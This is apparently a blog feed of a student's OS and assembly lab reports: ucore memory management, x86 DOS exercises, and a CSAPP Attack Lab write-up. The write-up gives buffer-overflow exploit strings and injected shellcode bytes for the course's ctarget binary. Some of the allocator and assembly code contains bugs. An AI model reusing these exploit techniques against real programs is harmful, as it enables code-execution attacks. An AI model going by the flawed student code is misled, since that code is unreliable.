jakevin的博客 2018-10-09T05:20:46.923Z https://jackwener.github.io/ jakevin Hexo ucore-lab1实验报告 https://jackwener.github.io/2018/10/09/ucore-lab1实验报告/ 2018-10-09T05:19:03.000Z 2018-10-09T05:20:46.923Z Ucore lab1实验报告

第一部分

practice1

  1. 为何开启A20,以及如何开启A20
  2. 如何初始化GDT表(什么是GDT和LDT)
  3. 如何使能和进入保护模式

Intel x86系列CPU有实模式和保护模式,实模式从8086开始就有,保护模式从80386开始引入。为了兼容,Intel x86系列CPU都支持实模式。现代操作系统都是运行在保护模式下(Intel x86系列CPU)。计算机启动时,默认的工作模式是实模式,为了让内核能运行在保护模式下,Bootloader需要从实模式切换到保护模式,切换步骤如下:

  1. 准备好GDT(Global Descriptor Table)
  2. 关中断
  3. 加载GDT到GDTR寄存器
  4. 开启A20,让CPU寻址大于1M
  5. 开启CPU的保护模式,即把cr0寄存器第一个bit置1
  6. 跳转到保护模式代码

practice2

  1. bootloader如何读取硬盘扇区的?
  2. bootloader是如何加载ELF格式的OS?

计算机启动是从BIOS开始,再由BIOS决定从哪个设备启动以及启动顺序,比如先从DVD启动再从硬盘启动等。计算机启动后,BIOS根据配置找到启动设备,并读取这个设备的第0个扇区,把这个扇区的内容加载到0x7c00,之后让CPU从0x7c00开始执行,这时BIOS已经交出了计算机的控制权,由被加载的扇区程序接管计算机。

这第一个扇区的程序就叫Boot,它一般做一些准备工作,把操作系统内核加载进内存,并把控制权交给内核。由于Boot只能有一个扇区大小,即512字节,它所能做的工作很有限,因此它有可能不直接加载内核,而是加载一个叫Loader的程序,再由Loader加载内核。因为Loader不是BIOS直接加载的,所以它可以突破512字节的程序大小限制(在实模式下理论上可以达到1M)。如果Boot没有加载Loader而直接加载内核,我们可以把它叫做Bootloader。

Bootloader加载内核就要读取文件,在实模式下可以用BIOS的INT 13h中断。内核文件放在哪里,怎么查找读取,这里牵涉到文件系统,Bootloader要从硬盘(软盘)的文件系统中查找内核文件,因此Bootloader需要解析文件系统的能力。GRUB是一个专业的Bootloader,它对这些提供了很好的支持

elf格式前提须知

lab1感觉没啥好写的…弃之

]]> <h1 id="Ucore-lab1实验报告"><a href="#Ucore-lab1实验报告" class="headerlink" title="Ucore lab1实验报告"></a>Ucore lab1实验报告</h1><h2 id="第一部分"><a href="#第 ucore_lab2实验报告 https://jackwener.github.io/2018/09/28/ucore-lab2实验报告/ 2018-09-28T04:45:17.000Z 2018-10-09T04:20:34.937Z ucore lab2实验报告

实验二 主要针对完成Ucore的物理内存管理

练习0

key point:

利用meld工具进行比较与合并

练习1:实现first-fit练习物理内存分配算法

介绍ucore很详细的总结

Note:

连续分配方式,是指为一个用户程序分配一个连续的内存空间。它主要包括单一连续分配、固定分区分配和动态分区分配。

单一连续分配

固定分区分配

动态分区分配

动态分区分配又称为可变分区分配,是一种动态划分内存的分区方法。这种分区方法不预先将内存划分,而是在进程装入内存时,根据进程的大小动态地建立分区,并使分区的大小正好适合进程的需要。因此系统中分区的大小和数目是可变的

动态分区

在进程装入或换入主存时,如果内存中有多个足够大的空闲块,操作系统必须确定分配哪个内存块给进程使用,这就是动态分区的分配策略,考虑以下几种算法:

  • 首次适应(First Fit)算法:空闲分区以地址递增的次序链接。分配内存时顺序查找,找到大小能满足要求的第一个空闲分区。
  • 最佳适应(Best Fit)算法:空闲分区按容量递增形成分区链,找到第一个能满足要求的空闲分区。
  • 最坏适应(Worst Fit)算法:又称最大适应(Largest Fit)算法,空闲分区以容量递减的次序链接。找到第一个能满足要求的空闲分区,也就是挑选出最大的分区。
  • 邻近适应(Next Fit)算法:又称循环首次适应算法,由首次适应算法演变而成。不同之处是分配内存时从上次查找结束的位置开始继续查找。

在这几种方法中,首次适应算法不仅是最简单的,而且通常也是最好和最快的。在UNIX 系统的最初版本中,就是使用首次适应算法为进程分配内存空间,其中使用数组的数据结构 (而非链表)来实现。不过,首次适应算法会使得内存的低地址部分出现很多小的空闲分区,而每次分配查找时,都要经过这些分区,因此也增加了查找的开销。

邻近适应算法试图解决这个问题,但实际上,它常常会导致在内存的末尾分配空间(因为在一遍扫描中,内存前面部分使用后再释放时,不会参与分配),分裂成小碎片。它通常比首次适应算法的结果要差。

最佳适应算法虽然称为“最佳”,但是性能通常很差,因为每次最佳的分配会留下很小的难以利用的内存块,它会产生最多的外部碎片。

最坏适应算法与最佳适应算法相反,选择最大的可用块,这看起来最不容易产生碎片,但是却把最大的连续内存划分开,会很快导致没有可用的大的内存块,因此性能也非常差。

Kunth和Shore分别就前三种方法对内存空间的利用情况做了模拟实验,结果表明:

首次适应算法可能比最佳适应法效果好,而它们两者一定比最大适应法效果好。另外注意,在算法实现时,分配操作中最佳适应法和最大适应法需要对可用块进行排序或遍历查找,而首次适应法和邻近适应法只需要简单查找;回收操作中,当回收的块与原来的空闲块相邻时(有三种相邻的情况,比较复杂),需要将这些块合并。在算法实现时,使用数组或链表进行管理。除了内存的利用率,这里的算法开销也是操作系统设计需要考虑的一个因素。

为了与以后的分页机制配合,首先需要建立对整个计算机的每一个物理页的属性,用结构体Page来表示,它包含了映射此物理页的虚拟页个数,描述物理页属性的flags和双向链接各个Page结构的page_link双向链表。

1
2
3
4
5
6
7
> struct Page{
>     int ref;
>     uint32_t flags;
>     unsigned int property;
>     list_entry_t page_link;
> }123456
>

  • ref

      表示该页被页表的引用记数。如果这个页被页表引用了,即在某页表中有一个页表项设置一个虚拟页到这个Page管理的物理页的映射关系,就会把Page的ref加一。反之,若页表项取消,即映射关系解除,就减一。

  • flags

       表示此物理页的状态标记,有两种属性,bit 0表示是否被保留,如果被保留了则设为1,且不能放到空闲页链表中,即这样的页不是空闲页,不能动态分配与释放。比如内核代码占用的空间。bit 1表示此页是否是空闲的。如果设置为1,表示这页是空闲的,可以被分配;如果设置为0,表示这页已经被分配出去了,不能被再二次分配。

  • property

      用来记录某连续内存空闲块的大小(即地址连续的空闲页的个数)。这里需要注意的是用到此成员变量的这个Page比较特殊,是连续内存空闲地址最小的一夜(即第一页)。

  • page_link

      是便于把多个连续内存空闲块链接在一起的双向链表指针,连续内存空闲块利用这个页的成员变量page_link来链接比它地址小和大的其他连续内存空闲块

  为了有效的管理这些小连续内存空闲块,所有的连续内存空闲块可用一个双向链表来管理,便于分配和释放,为此定义一个free_area_t

1
2
3
4
5
> typedef struct {
>     list_entry_t free_list;         // the list header
>     unsigned int nr_free;           // number of free pages in this free list
> } free_area_t;1234
>
  • free_list是一个list_entry结构的双向链表指针
  • nr_free则记录当前空闲页的个数

有了这两个数据结构,就可以管理起来整个以页尾单位的物理内存空间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
static void
default_init_memmap(struct Page *base, size_t n)
{
    assert(n > 0);
    struct Page *p = base;
    for (; p != base + n; p++)
    {
        // 断言
        assert(PageReserved(p));
        p->flags = p->property = 0;
        SetPageReserved(base);
        // 引用位 置0
        set_page_ref(p, 0);
        list_add_before(&free_list, &(p->page_link));
    }
    base->property = n;
    // SetPageProperty(base);
    nr_free += n;
    // list_add(&free_list, &(base->page_link));
}

static struct Page *
default_alloc_pages(size_t n) {
    assert(n > 0);
    if (n > nr_free) {//当空闲页不够时,返回NULL
        return NULL;
    }
    list_entry_t *le = &free_list;
    while ((le = list_next(le)) != &free_list) {//遍历所有指针
        struct Page *p = le2page(le, page_link);//转换为页结构
        if (p->property >= n) {//如果找到空闲页大小大于等于n时选中
            int i;
            list_entry_t *len;
            for(i = 0; i < n; i++)//初始化分配内存
            {
                len = list_next(le);
                struct Page *p2 = le2page(temp_le, page_link);    //转换页结构
                SetPageReserved(p2);  //初始化标志位
                ClearPageProperty(p2);   
                list_del(le);  //清除双向链表指针
                le = len;  
            }
            if(p->property > n)
            {  
                //若大小>n,只取大小为n的块
                (le2page(le,page_link))->property = p->property - n;  
            }  
            ClearPageProperty(p);  //初始化标志位
            SetPageReserved(p);  
            nr_free -= n;  //空闲页大小-n
            return p;  
        }
    }
    return NULL;//分配失败
}

static void
default_free_pages(struct Page *base, size_t n) {
    assert(n > 0);
    assert(PageReserved(base));

    list_entry_t *le = &free_list;//找合适的位置
    struct Page *p = base;
    while((le=list_next(le)) != &free_list) 
    {
        p = le2page(le, page_link);
        if(p > base)
        {
            break;
        }
    }
    for(p = base; p < base + n; p++)//在之前插入n个空闲页
    {
        list_add_before(le, &(p->page_link));
        p->flags = 0;//设置标志
        set_page_ref(p, 0);
        ClearPageProperty(p);
        SetPageProperty(p);
    }

    base->property = n;//设置连续大小为n
    //如果是高位,则向高地址合并
    p = le2page(le,page_link);
    if(base + base->property == p )
    {
        base->property += p->property;
        p->property = 0;
    }
    //如果是低位且在范围内,则向低地址合并
    le = list_prev(&(base->page_link));
    p = le2page(le, page_link);
    if(le != &free_list && p == base-1)//满足条件,未分配则合并
    {
        while(le != &free_list)
        {
            if(p->property)//当连续时
            {
                p->property += base->property;
                base->property = 0;
                break;
            }
            le = list_prev(le);
            p = le2page(le,page_link);
        }
    }

    nr_free += n;
}

练习2:实现寻找虚拟地址对应的页表项

页表机制

请求分页系统的页表机制不同于基本分页系统,请求分页系统在一个作业运行之前不要求全部一次性调入内存,因此在作业的运行过程中,必然会出现要访问的页面不在内存的情况,如何发现和处理这种情况是请求分页系统必须解决的两个基本问题。为此,在请求页表项中增加了四个字段,如图

图2

增加的四个字段说明如下:

  • 状态位P:用于指示该页是否已调入内存,供程序访问时参考。
  • 访问字段A:用于记录本页在一段时间内被访问的次数,或记录本页最近己有多长时间未被访问,供置换算法换出页面时参考。
  • 修改位M:标识该页在调入内存后是否被修改过。
  • 外存地址:用于指出该页在外存上的地址,通常是物理块号,供调入该页时参考。

缺页中断机构

在请求分页系统中,每当所要访问的页面不在内存时,便产生一个缺页中断,请求操作系统将所缺的页调入内存。此时应将缺页的进程阻塞(调页完成唤醒),如果内存中有空闲块,则分配一个块,将要调入的页装入该块,并修改页表中相应页表项,若此时内存中没有空闲块,则要淘汰某页(若被淘汰页在内存期间被修改过,则要将其写回外存)。

缺页中断作为中断同样要经历,诸如保护CPU环境、分析中断原因、转入缺页中断处理程序、恢复CPU环境等几个步骤。但与一般的中断相比,它有以下两个明显的区别:

  • 在指令执行期间产生和处理中断信号,而非一条指令执行完后,属于内部中断。
  • 一条指令在执行期间,可能产生多次缺页中断。

地址变换机构

请求分页系统中的地址变换机构,是在分页系统地址变换机构的基础上,为实现虚拟内存,又增加了某些功能而形成的。

图三

如图3-25所示,在进行地址变换时,先检索快表:

  • 若找到要访问的页,便修改页表项中的访问位(写指令则还须重置修改位),然后利用页表项中给出的物理块号和页内地址形成物理地址。
  • 若未找到该页的页表项,应到内存中去查找页表,再对比页表项中的状态位P,看该页是否已调入内存,未调入则产生缺页中断,请求从外存把该页调入内存。

注意自己了解高端内存概念

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
//typedef uintptr_t pde_t;
    pde_t *pdep = &pgdir[PDX(la)];  // (1)获取页表
    if (!(*pdep & PTE_P))             // (2)假设页目录项不存在
    {      
        struct Page *page;
        if (!create || (page = alloc_page()) == NULL) // (3) check if creating is needed, then alloc page for page table
        {    //假如不需要分配或是分配失败
            return NULL;
        }
        set_page_ref(page, 1);                      // (4)设置被引用1次
        uintptr_t pa = page2pa(page);                  // (5)得到该页物理地址
        memset(KADDR(pa), 0, PGSIZE);                  // (6)物理地址转虚拟地址,并初始化
        *pdep = pa | PTE_U | PTE_W | PTE_P;            // (7)设置可读,可写,存在位
    }
    return &((pte_t *)KADDR(PDE_ADDR(*pdep)))[PTX(la)];     // (8) return page table entry
    //KADDR(PDE_ADDR(*pdep)):这部分是由页目录项地址得到关联的页表物理地址,再转成虚拟地址
    //PTX(la):返回虚拟地址la的页表项索引
    //最后返回的是虚拟地址la对应的页表项入口地址

练习3: 释放某虚地址所在的页并取消对应二级页表项的映射

释放某虚拟地址所在的页并取消对应的二级页表项的映射(需要编程)

当释放一个包含某虚地址的物理内存页时,需要让对应此物理内存页的管理数据结构Page做相关的清除

处理,使得次物理内存页成为空闲;另外还需把表示虚地址与物理地址对应关系的二级页表项清除

1
2
3
4
5
6
7
8
9
10
if (*ptep & PTE_P)                 //(1) check if this page table entry is present
    {      //假如页表项存在
        struct Page *page = pte2page(*ptep);//(2)找到页表项的那一页信息
        if (page_ref_dec(page) == 0)//(3)如果没有被引用
        { 
            free_page(page);//(4)释放该页
        }
        *ptep = 0;         //(5)该页目录项清零
        tlb_invalidate(pgdir, la); //(6) flush tlb当修改的页表是进程正在使用的那些页表,使之无效
    }
]]> <h2 id="ucore-lab2实验报告"><a href="#ucore-lab2实验报告" class="headerlink" title="ucore lab2实验报告"></a>ucore lab2实验报告</h2><blockquote> <p>实验二 主要针对完 hit-os-lab2 https://jackwener.github.io/2018/06/09/hit-os-lab2/ 2018-06-09T02:28:21.000Z 2018-06-09T02:28:21.778Z hit-os-lab1 https://jackwener.github.io/2018/06/09/hit-os-lab1/ 2018-06-09T02:28:05.000Z 2018-06-09T02:28:05.298Z CSAPP attacklab(伪)报告 https://jackwener.github.io/2018/05/29/attacklab/ 2018-05-29T12:55:29.000Z 2018-05-29T15:06:36.939Z

脑袋一片浆糊,辣鸡而茫然

Attack Lab

此处Lab的主要目的是利用程序中的缓冲区溢出漏洞来实现对系统的攻击

Level1

第一个关卡不要求向程序中注入代码,而是需要输入一个「引爆字符串」来改变程序的运行轨迹,重定向运行另外一个函数。在 ctarget 中,getbuf 被函数 test 调用:

1
2
3
4
5
void test() {
  int val;
  val = getbuf();
  printf("No exploit.  Getbuf returned 0x%x\n", val);
}

我们希望 getbuf() 在返回后,调用函数 touch1 而不是输出 val 的值。

1
2
3
4
5
6
void touch1() {
  vlevel = 1;
  printf("Touch1!: You called touch1()\n");
  validate(1);
  exit(0);
}

首先反汇编:objdump -d ctarget > touch.s

我们可以看到,getbuf 将 %rsp 移动了 0x28 也就是 40 字节。这也就意味着,在往上 4 个字节,就是返回到 test 的返回地址。所以,我们就可以利用缓冲区溢出将返回地址修改掉。

可以看到 touch1 的开始地址在 0x004017c0,所以我们输入的字符串可以是

1
2
3
4
5
6
7
8
9
10
11
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
c0 17 40 00

然后,我们将这个字符文件转换为字节码 ./hex2raw < touch1.txt > touch1solve.txt,然后执行 ./ctarget -q -i touch1solve.txt

Level2

第二阶段要求向程序中注入一小段代码,ctarget 中的 touch2 的 C 语言代码为:

1
2
3
4
5
6
7
8
9
10
11
void touch2(unsigned val) {
  vlevel = 2;    /*Part of validation protocol*/
  if (val == cookie) {
    printf("Touch2!: You called touch2(0x%.8x)\n", val);
    validate(2);
  } else {
    printf("Misfire: You called touch2(0x%.8x)\n", val);
    fail(2);
  }
  exit(0);
}

这里使用缓存区作为代码执行区域,缓存区溢出后,将返回地址写为缓存区首地址,然后执行缓存区所存的指令,首先先找出缓冲区首地址

不多bb,看图;
图片1

可以看到首地址为0x5561dc78,顺便看到第6行也就是0x28个字节之后存放的原返回地址。

和Level1一样,覆盖原返回地址,另外还要写入攻击指令。
先将指令转为机器码。

movq $0x59b997fa,%rdi # rdi = cookie

movq $0x5561dc98,%rsp # 将rsp设为存放在栈中的touch2地址的地址
ret # 读取rsp指向的地址并跳转

利用gcc -c命令将汇编语句编译成机器码,再objdump -d生成的文件就可以间接地看到最终的机器码。

得到答案为

1
2
3
4
5
6
48 c7 c7 fa 97 b9 59 48
c7 c4 98 dc 61 55 c3 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ec 17 40 00 00 00 00 00
78 dc 61 55 00 00 00 00

Level3

第三阶段同样要实现代码注入攻击,但是要传入一个额外的字符串。

在 ctarget 中 hexmatch 和 touch3 的 C 语言代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/* compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval) {
  char cbuf[110];
  /* make position of check string unpredictable*/
  char* s = cbuf + random() % 100;
  sprintf(s, "%.8x", val);
  return strncmp(sval, s, 9) == 0;
}
void touch3(char *sval) {
  vlevel = 3;
  if (hexmatch(cookie, sval)) {
    printf("Touch3!: You called You called touch3(\"%s\")\n", sval)
    validate(3);
  } else {
    printf("Misfire: You called touch3(\"%s\")\n", sval);
    fail(3);
  }
  exit(0);
}

我们需要在引爆字符串中包含自己 cookie 的字符串表示,这个字符串应该是 8 个 16 进制数字,并以 0 为结尾。这个字符串的地址应该被保存在 %rdi 中。当函数 hexmatch 和 strncmp 被调用的时候,他们会把参数保存到栈上,这会覆盖 getbuf 写入的部分内容。所以,我们需要小心引爆字符串的存放位置。避开调用hexmatch和strncmp保存在栈上的位置。如果目标字符串存放的位置比touch3存放地址更低,在最终字符串对比的时候会发现rdi指向地址的内容发生了改变。

汇编代码为:

1
2
3
mov $0x5561dcb8,%rdi
pushq $0x4018fa
ret

构造字符串为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
48 c7 c7 b8
dc 61 55 68
fa 18 40 00
c3 00 00 00
35 39 62 39
39 37 66 61
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
78 dc 61 55
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
35 39 62 39
39 37 66 61
00 00 00 00

]]> <blockquote> <p>脑袋一片浆糊,辣鸡而茫然</p> </blockquote> <h1 id="Attack-Lab"><a href="#Attack-Lab" class="headerlink" title="Attack Lab"></a>Attack La 汇编语言-王爽-实验任务 https://jackwener.github.io/2018/05/11/assasAnswer/ 2018-05-11T09:17:46.000Z 2018-05-19T10:44:52.307Z 扯话

开始啃汇编啦,看过CSAPP第三章后,感觉上手还是比较友好的

准备顺序大概是

王爽汇编语言 -> x86汇编语言:从实模式到保护模式 -> 操作系统

实验

准备工作

书上的环境是在windows下,由于我是使用的linux发行版deepin,所以选择了一些工具代替

试了一下,现在用win10去使用DOS估计也不是特别简单,干脆就用LINUX了

使用dosemu模拟DOS环境

安装dosemu

只需要一句简单的命令行即可安装dosemu

sudo apt-get install dosemu

安装MASM6.115.0

在下载完MASM6.11后,在HOME文件夹下解压,于是我们得到了MASM611的安装文件夹
后续安装后,使用过程出现了缺少dosxnt.exe文件的报错,google后折腾了一个小时左右,后面还是换版本了

使用的是MASM5.0

dosemu下看到的C盘和D盘只是虚拟出来的,对应的目录在~/.dosemu/drives 下。

下载解压后,将link.exe和masm.exe放到C盘下,直接使用就可以了

具体使用书上有解释,就不赘述了.

实验1 查看CPU和内存,用机器指令和汇编指令编程

  1. 使用Debug,将下面的程序段写入内存,逐条执行,观察每条指令执行后,CPU中相关寄存器的变化。
机器码汇编指令执行后相关寄存器变化
b8 20 4emov ax, 4E20HAX=4E20H
05 16 14add ax, 1416HAX=6236H
bb 00 20mov bx, 2000HBX=2000H
01 d8add ax, bxAX=8236H
89 c3mov bx, axBX=8236H
01 d8add ax, bxAX=046CH
b8 1a 00mov ax, 001AHAX=001AH
bb 26 00mov bx, 0026HBX=0026H
00 d8add al, blAX=0040H
00 dcadd ah, blAX=2640H
00 c7add bh, alBX=4026H
b4 00mov ah, 0AX=0040H
00 d8add al, blAX=0066H
04 9cadd al, 9CHAX=0002H

提示,可用E命令和A命令以两种方式将指令写入内存。注意用T命令执行时,CS:IP的指向。

2.将下面3条指令写入从2000:0开始的内存单元中,利用这3条指令计算2的8次方。

1
2
3
4
5
6
1
2
3
mov ax, 1
add ax, ax
jmp 2000:0003

一个循环,很好理解

3.查看内存中的内容。

PC机主板上的ROM写有一个生产日期,在内存FFF00H~FFFFFH的某几个单元中,请找到这个生产日期并试图改变它。
提示,如果读者对实验的结果感到疑惑,请仔细阅读第1章中的1.15节。

用D命令能看到储存在FFF0:00F5-00FC之间,xx/xx/xx ,模拟器是可以改的,然后真实情况应该是不可以改的(猜测),应该是写死了,无写权限

实验二

  1. 使用Debug,将下面的程序段写入内存,逐条执行,根据指令执行后的实验运行情况填空。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mov ax, ffff
mov ds, ax
mov ax, 2200
mov ss, ax
mov sp, 1000
mov ax,[0]  ;ax = _____
add ax,[2]  ;ax = _____
mov bx,[4]  ;bx = _____
add bx,[6]  ;bx = _____
push ax     ;sp = _____ 修改的内存单元的地址是_____内容为_____
push bx     ;sp = _____ 修改的内存单元的地址是_____内容为_____
pop ax      ;sp = _____ ax = _____
pop bx      ;sp = _____ bx = _____
push [4]    ;sp = _____ 修改的内存单元的地址是_____内容为_____
push [6]    ;sp = _____ 修改的内存单元的地址是_____内容为_____

结果

1
2
3
4
5
6
7
8
9
10
5bea
00e0
32f0
2f32
00FE 220FE 25EE
00FC 220FC 5F37
00FE 5F37
0100 25EE
00FE 220FE 3002
00FC 220FC 2F35

2.仔细观察图3.19中的实验过程,然后分析:为什么2000:0~2000:f中的内容会发生改变?

在使用T命令时,产生了中断,为了保护现场,CPU将CS和IP,此时的位置,入栈,导致了内存相关位置内容的改变。

实验三

  1. 将下面的程序保存为t1.asm文件,将其生成可执行文件t1.exe。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
assume cs:codesg
codesg segment
mov ax, 2000H
mov ss, ax
mov sp, 0
add sp, 10
pop ax
pop bx
push ax
push bx
pop ax
pop bx
mov ax, 4c00h
int 21h
codesg ends
end

这个没什么好说的….

  1. 用Debug跟踪t1.exe的执行过程,写出每一步执行后,相关寄存器中的内容和栈顶的内容。
结果
ax 2000H
ss 2000H
sp 0000H
sp 000AH
ax 0 sp 000cH
bx 0 sp 000EH
sp 000cH
sp 000AH
ax 0 sp 000cH
bx 0 sp 000EH
ax 4c00H
empty
  1. PSP头两个字节为CD 20,用debug加载t1.exe.查看PSP内容:

PSP区域地址范围为:ds:0~ds:ff.用d命令查看即可

实验四

  1. 编程,向内存0:200~0:23F依此传送数据0~63(3FH)。

见下

  1. 编程,向内存0:200~0:23F依此传送数据0~63(3FH),程序中只能使用9条指令,9条指令中包括“mov ax, 4c00h”和“int 21h”。
1
2
3
4
5
6
7
8
9
10
11
12
13
assume cs:code
code segment
mov ax, 0020h
mov ds, ax
mov bx, 0
mov cx, 64
s:   mov [bx], bl ;此处注意![bx]为一字节,用bl
inc bl
loop s
mov ax, 4c00h
int 21h
code ends
end
  1. 下面的程序的功能是将“mov ax, 4c00h”之前的指令复制到内存的0:200处,补全程序,上机调试,跟踪运行结果。

下面的程序的功能是将“mov ax, 4c00h”之前的指令复制到内存的0:200处,补全程序,上机调试,跟踪运行结果。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
assume cs:code
code segment
mov ax, _____
mov ds, ax
mov ax, 0020h
mov es, ax
mov bx, 0
mov cx, _____
s:      mov al, [bx]
mov es:[bx], al
inc bx
loop s
mov ax, 4c00h
int 21h
code ends
end

程序入口为cs:0(ip=0),所以第一空处传递段地址为cs

而程序总代码长度可通过debug加载后通过u命令看出.先将第二空位随便设为1,加载后观察mov ax,4c00h之前代码为0000~0016h,总长度为23.

实验5 编写、调试具有多个段的程序

1.将下面的程序编译连接,用Debug加载、跟踪,然后回答问题。

答案:

data段中的数据不变。

07f3、07f4、07f2(答案不唯一)

X-2、X-1

2.将下面的程序编译连接,用Debug加载、跟踪,然后回答问题。

答案:

data段中的数据不变。

07f3、07f4、07f2(答案不唯一)

X-2、X-1

可以知道:数据段空间大小为定义数据所需的16字节的最小整数倍

([N]+1) * 16 (字节对齐)

3.将下面的程序编译连接,用Debug加载、跟踪,然后回答问题。

答案:

(3) x+3 x+4

4.如果将1. 2. 3.题中的最后一条伪指令“end start”改为“end”(也就是说,不指明程序的入口),则哪个程序仍然可以正确执行?请说明原因。

答案:
程序3,在不指明程序入口的情况下,程序默认按照顺序从头开始执行.

5.程序如下,编写code段中的代码,将a段和b段中的数据依此相加,将结果存到c段中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
start:
      mov ax, a
      mov ds, ax
      mov ax, b
      mov es, ax
      mov ax, c
      mov ss, ax
      mov bx 0
      mov cx 8
      s:
      mov al, [bx]
      add al, es:[bx]
      mov ss:[bx], al
      inc bx
      loop s

      mov ax, 4c00H
      int 21h

6.程序如下,编写code段中的代码,用push指令将a段中的前8个字型数据,逆序存储到b段中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
start:
mov ax, b
mov ss, ax
mov sp, 16
mov ax, a
mov ds, ax
mov bx, 0
mov cx, 8
s:
push [bx]
add bx,2
loop s

mov ax, 4c00H
int 21h

实验6 实践课程中的程序

1.将课程中所有讲解过的程序上机调试,用Debug跟踪其执行过程,并在过程中进一步理解所讲内容。

2.编程,完成问题7.9中的程序

解决方案有书上三种,用的是栈储存

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
start:
mov ax, codesg
mov ds, ax
moe ax, stacksg
mov ss, ax
mov sp, 16
mov bx, 0
mov cx, 4

s:
push cx
mov cx, 4
mov si, 0

s0:
mov al, [bx+si+3]
and al, 11011111b
mov [bx+si+3], al
inc si
loop s0
add bx,16

pop cx
loop s

mov ax,4c00H
int 21h

实验7 寻址方式在结构化数据访问中的应用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
assume cs:codesg, ss:stack

data segment
db '1975', '1976', '1977', '1978', '1979', '1980', '1981', '1982', '1983'
db '1984', '1985', '1986', '1987', '1988', '1989', '1990', '1991', '1992'
db '1993', '1994', '1995'

dd 16, 22, 382, 1356, 2390, 8000, 16000, 24486, 50065, 97479, 140417, 197514
dd 345980, 590827, 803530, 1183000, 1843000, 2759000, 3753000, 4649000, 5937000

dw 3, 7, 9, 13, 28, 38, 130, 220, 476, 778, 1001, 1442, 2258, 2793, 4037, 5635, 8226
dw 11542, 14430, 15257, 17800
data ends

table segment
db 21 dup ('year summ ne ?? ')
table ends

stack segment
dw 8 dup (0)         ;存放cx
stack ends

codesg segment
start:
mov ax, stack
mov ss, ax
mov sp, 16
mov ax, table
mov ds, dx
mov ax, date
mov es, ax

mov bx, 0
mov cx, 21
mov si, 0
year:
push cx
mov cx, 4
mov di, 0
s:
mov al, es:[si]
mov [bx+di], al
inc si
inc di
loop s
add bx,16
pop cx
loop s

mov cx, 21
mov bx, 0
income:
mov ax, es:[si]
mov 5[bx], ax
add si, 2
mov ax, es:[si]
mov 7[bx], ax
add si, 2
add bx, 16
loop income

mov cx, 21
mov bx, 0
staff:  mov ax, es:[si]
mov [10+bx], ax
add si, 2
add bx, 16
loop staff

mov cx, 21
mov bx, 0
average:mov ax, [bx+5]
mov dx, [bx+7]
div word ptr [bx+10]
mov [13+bx], ax
add bx, 16
loop average

mov ax, 4c00h
int 21h

codesg ends
end start

实验8 分析一个奇怪的程序

分析下面的程序,在运行前思考,这个程序可以正确返回吗?
运行后再思考:为什么是这种结果?
通过这个程序加深对相关内容的理解。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
assume cs:codesg
codesg segment
mov ax, 4c00h
int 21h
start: mov ax, 0
s:     nop
nop
mov di, offset s
mov si, offset s2
mov ax, cs:[si]
mov cs:[di], ax
s0:    jmp short s
s1:    mov ax, 0
int 21h
mov ax, 0
s2:    jmp short s1
nop
codesg ends
end start

jmp short 标号、jmp near ptr 标号、jcxz 标号、loop 标号等几种汇编指令,它们对 IP的修改是根据转移目的地址和转移起始地址之间的位移来进行的。不包含转移的目的地址,而包含的是到目的地址的位移距离。方便了程序段在内存中的浮动装配。

能成功返回,通过ax将s2的地址传送到s,jmp short s实际跳转到s2,而s2中jmp short s1计算的是s1,s2之间的偏移量,然后加上s的地址,实际跳转到首地址,完成返回

实验9 根据材料编程

编程:在屏幕中间分别显示绿色、绿底红色、白底蓝色的字符串’welcome to masm!’。
编程所需的只是通过阅读、分析下面的材料获得。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
assume ds:data, cs:code

data segment
db 'welcome to masm!'
data ends

code segment
start:  mov ax, data
mov ds, ax
mov ax, 0B800H
mov es, ax

mov bx, 1664
mov si, 0
mov cx, 16
char1:  mov al, [si]
mov ah, 10000010B
mov es:[bx], ax
add bx, 2
inc si
loop char1

mov bx, 1824
mov si, 0
mov cx, 16
char2:  mov al, [si]
mov ah, 10100100B
mov es:[bx], ax
add bx, 2
inc si
loop char2

mov bx, 1984
mov si, 0
mov cx, 16
char3:  mov al, [si]
mov ah, 11110001B
mov es:[bx], ax
add bx, 2
inc si
loop char3

mov ax, 4C00H
int 21H
code ends
end start

实验10 编写子程序

1.显示字符串

注意事项:

1.计算偏移地址的时候,以bx作为偏移量,ax不行

例如 es:[bx+si] 而不是 es:[ax+si]

2.子程序开始的时候把所有的寄存器入栈,方便接下来使用,结束的时候出栈

3.计算数组偏移地址的时候,用mul

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
